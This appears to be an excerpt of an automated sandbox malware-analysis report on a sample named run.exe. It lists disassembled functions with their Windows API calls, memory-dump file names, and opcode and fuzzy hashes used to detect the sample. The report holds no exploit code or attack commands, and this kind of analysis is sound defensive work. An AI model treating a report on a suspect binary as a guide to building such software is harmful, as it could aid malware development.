                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBE0AC Relevance: 6.1, APIs: 4, Instructions: 104COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo$ByteCharErrorLastMultiWide
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 4141327611-0
                                                                                                                                                                                                              • Opcode ID: dfc190c3250fbabd448dc32bc4e835edfed1d8db7e762c357c7a8baf22f899c1
                                                                                                                                                                                                              • Instruction ID: 770b502513058eb87d3a4b1159206b3d5d0b2ae273040c1109e7ee77e209fae2
                                                                                                                                                                                                              • Opcode Fuzzy Hash: dfc190c3250fbabd448dc32bc4e835edfed1d8db7e762c357c7a8baf22f899c1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 25414131A086C2C7FB65AE70D4403F9E691AF84B90FAC8130EA5D46AE9DF2DDD418725
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBC1748 Relevance: 6.1, APIs: 4, Instructions: 74COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC1761
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC17C3
                                                                                                                                                                                                              • WideCharToMultiByte.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC17FD
                                                                                                                                                                                                              • FreeEnvironmentStringsW.KERNEL32(?,?,?,?,?,?,?,00007FF75FBBCDA7), ref: 00007FF75FBC1827
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharEnvironmentMultiStringsWide$Free
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1557788787-0
                                                                                                                                                                                                              • Opcode ID: 0113d89e325566aa04d235509747aed1e80d5133048b2332893ed2dad67738d1
                                                                                                                                                                                                              • Instruction ID: b42994cf79930abafe094869be509c4b203e5876b9ff5d35f98ee18a205896e3
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 0113d89e325566aa04d235509747aed1e80d5133048b2332893ed2dad67738d1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 3E216121E18BD2C2E624AF22A40006AF6A5BB58BD0B9C8135DE9E77B94DF3CE4518714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBE5C0 Relevance: 6.0, APIs: 4, Instructions: 43COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE5CA
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE632
                                                                                                                                                                                                              • SetLastError.KERNEL32(?,?,?,00007FF75FBB8850,?,?,00000050,00007FF75FBBA65D), ref: 00007FF75FBBE648
                                                                                                                                                                                                              • abort.LIBCMT ref: 00007FF75FBBE64E
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ErrorLast$abort
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1447195878-0
                                                                                                                                                                                                              • Opcode ID: fc361668dc00292c4d89f0512581aa4fe2d187d76f943a463509bf139270ae6a
                                                                                                                                                                                                              • Instruction ID: 9324d2048941b96c391d2b06a12deb1cf9d4bc302ec66f420e2df9fa5b672de5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: fc361668dc00292c4d89f0512581aa4fe2d187d76f943a463509bf139270ae6a
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 62015720F0D683C3EA587B7199A91BAE1516F48784F8C0138D90E467E6EE3DF8414634
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2B74 Relevance: 6.0, APIs: 4, Instructions: 31COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2F08: ResetEvent.KERNEL32 ref: 00007FF75FBA2F21
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2F08: ReleaseSemaphore.KERNEL32 ref: 00007FF75FBA2F37
                                                                                                                                                                                                              • ReleaseSemaphore.KERNEL32 ref: 00007FF75FBA2BA0
                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF75FBA2BBF
                                                                                                                                                                                                              • DeleteCriticalSection.KERNEL32 ref: 00007FF75FBA2BD6
                                                                                                                                                                                                              • CloseHandle.KERNEL32 ref: 00007FF75FBA2BE3
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2C88: WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C8F
                                                                                                                                                                                                                • Part of subcall function 00007FF75FBA2C88: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C9A
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CloseHandleReleaseSemaphore$CriticalDeleteErrorEventLastObjectResetSectionSingleWait
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 502429940-0
                                                                                                                                                                                                              • Opcode ID: 7e5acb6efb17c55637e1a02433679e597c2369eb0fc72b254ce30994d3159d84
                                                                                                                                                                                                              • Instruction ID: f06dce186ceb76e1db44c34f05f2d4e3e38d2b304b00ec88678248b40e8df365
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 7e5acb6efb17c55637e1a02433679e597c2369eb0fc72b254ce30994d3159d84
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 91014036A25ED2E3E649AF31D9542AEA370FB88B80F844031DB9D03651CF39E4B1C750
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBAE298 Relevance: 6.0, APIs: 4, Instructions: 21COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CapsDevice$Release
                                                                                                                                                                                                              • String ID:
                                                                                                                                                                                                              • API String ID: 1035833867-0
                                                                                                                                                                                                              • Opcode ID: 365822f344308b0e1bed2dbe9a2ca4eca0d4d93b05c40d9d1d5711565badd9f6
                                                                                                                                                                                                              • Instruction ID: 1dd1a066a245cb59ff7ea3b3e05684be7c01ee945abec5d8054713b49c373270
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 365822f344308b0e1bed2dbe9a2ca4eca0d4d93b05c40d9d1d5711565badd9f6
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 2AE012A0E0978682FF087BB1B81A179D195AF49745F8C403DC90E46350DE3DA0468724
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBEC64 Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 138COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: _invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: e+000$gfff
                                                                                                                                                                                                              • API String ID: 3215553584-3030954782
                                                                                                                                                                                                              • Opcode ID: 10ccbbf0299460f6903a500f40f356ff2800e2b75a3197a1f4f5dede92a68199
                                                                                                                                                                                                              • Instruction ID: fe58c4e0ba4126e23b69363b43aafd37d9ecca5de3e70bf00c221d9d3f8e73a5
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 10ccbbf0299460f6903a500f40f356ff2800e2b75a3197a1f4f5dede92a68199
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 94514B62B187C2C7E7259F3598413A9AB91EB41B90F8C9231C79C47BD6CF6DE840C714
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9CBCC Relevance: 5.4, APIs: 1, Strings: 2, Instructions: 114COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(?,00007FF75FB9B384,?,?,?,?,?,?,?,00007FF75FB9A5D6), ref: 00007FF75FB9CCBA
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: CurrentDirectory
                                                                                                                                                                                                              • String ID: UNC$\\?\
                                                                                                                                                                                                              • API String ID: 1611563598-253988292
                                                                                                                                                                                                              • Opcode ID: 6ce2730799c8cf6edd3cf1896ea7d56aef548004643df73b383de5e272085a31
                                                                                                                                                                                                              • Instruction ID: 65f826bddcfa344131af7e756a92c8db06a73c5196c70e4c16838d933ef6a864
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 6ce2730799c8cf6edd3cf1896ea7d56aef548004643df73b383de5e272085a31
                                                                                                                                                                                                              • Instruction Fuzzy Hash: E14182A1F086C3D1EA20BB31D6411FAABA1AF45BC0BC99031DA5D07B9ADF7CE545C361
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBCC0C Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 107COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileModuleName_invalid_parameter_noinfo
                                                                                                                                                                                                              • String ID: C:\Users\user\AppData\Local\Temp\7zS49DD90FA\run.exe
                                                                                                                                                                                                              • API String ID: 3307058713-591759711
                                                                                                                                                                                                              • Opcode ID: aca7c5fa5063eade2b3bebe52993f8116910a6355c909001085006c57a59a518
                                                                                                                                                                                                              • Instruction ID: b66bd529413ebcfe3ad299508871d7eee3ac7a0a6740787807724db2d8993a88
                                                                                                                                                                                                              • Opcode Fuzzy Hash: aca7c5fa5063eade2b3bebe52993f8116910a6355c909001085006c57a59a518
                                                                                                                                                                                                              • Instruction Fuzzy Hash: DB417EB6A08A92C6E715FF3594400FDE794EB45B94B984031E94D47B89DE3CE8818364
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBBF708 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 70COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: FileHandleType
                                                                                                                                                                                                              • String ID: @
                                                                                                                                                                                                              • API String ID: 3000768030-2766056989
                                                                                                                                                                                                              • Opcode ID: 112a506a82efb5da906e7b20e69aa1c8f65fbbe054c80e7da412f3230a8ebdf0
                                                                                                                                                                                                              • Instruction ID: fc975dbf740749bf24413bb8810ccd092b6603af2c2cfa561c36a00ce9785ad4
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 112a506a82efb5da906e7b20e69aa1c8f65fbbe054c80e7da412f3230a8ebdf0
                                                                                                                                                                                                              • Instruction Fuzzy Hash: F121D76AA18BC2C2EB609B76D4901B9A650EB45774FAC1375D66E077D4CE38DC81C324
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FB9EDC0 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 63COMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ByteCharMultiWide_snwprintf
                                                                                                                                                                                                              • String ID: $%s$@%s
                                                                                                                                                                                                              • API String ID: 2650857296-834177443
                                                                                                                                                                                                              • Opcode ID: 56e57cf1c09785867a53bbaefc766c6cc58eeb29897c9ff07dd84e4525d1ecf1
                                                                                                                                                                                                              • Instruction ID: 4b935fe5b8070f067752d59386c007a8afebbcc18a0e9b9e14f04f79ee1301f9
                                                                                                                                                                                                              • Opcode Fuzzy Hash: 56e57cf1c09785867a53bbaefc766c6cc58eeb29897c9ff07dd84e4525d1ecf1
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 5A21A271A18BC2D1EBA0EB21E1403EAA364FB84B80FD84036DA4C03B54CF7ED945C760
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBB58D4 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 42COMMONLIBRARYCODE
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797417070.00007FF75FBC8000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBD8000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBDF000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797433376.00007FF75FBFC000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FBFE000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797477215.00007FF75FC18000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                                              • Snapshot File: hcaresult_2_2_7ff75fb90000_run.jbxd
                                                                                                                                                                                                              Similarity
                                                                                                                                                                                                              • API ID: ExceptionFileHeaderRaise
                                                                                                                                                                                                              • String ID: csm
                                                                                                                                                                                                              • API String ID: 2573137834-1018135373
                                                                                                                                                                                                              • Opcode ID: f29d77152debfc2f8eafed337615e021f7e67407580bf3ec3e672dc6c6bff7a2
                                                                                                                                                                                                              • Instruction ID: a9fd8e7424b13587cd35032d215a1d89fbac663ae3453232f98676018de665d0
                                                                                                                                                                                                              • Opcode Fuzzy Hash: f29d77152debfc2f8eafed337615e021f7e67407580bf3ec3e672dc6c6bff7a2
                                                                                                                                                                                                              • Instruction Fuzzy Hash: 0D110032618B82C2EB119F25E44029AB7A5FB84B94F9C4235EECD07758DF3DDA518B14
                                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                                              Function 00007FF75FBA2C88 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 16synchronizationCOMMON
                                                                                                                                                                                                              Download Yara Rule
                                                                                                                                                                                                              APIs
                                                                                                                                                                                                              • WaitForSingleObject.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C8F
                                                                                                                                                                                                              • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,00007FF75FBA2B8B,?,?,?,00007FF75FB9BDA6,?,?,?), ref: 00007FF75FBA2C9A
                                                                                                                                                                                                              Strings
                                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                                              • Source File: 00000002.00000002.1797393898.00007FF75FB91000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF75FB90000, based on PE: true
                                                                                                                                                                                                              • Associated: 00000002.00000002.1797381061.00007FF75FB90000.00000002.00000001.01000000.00000006.sdmpDownload File
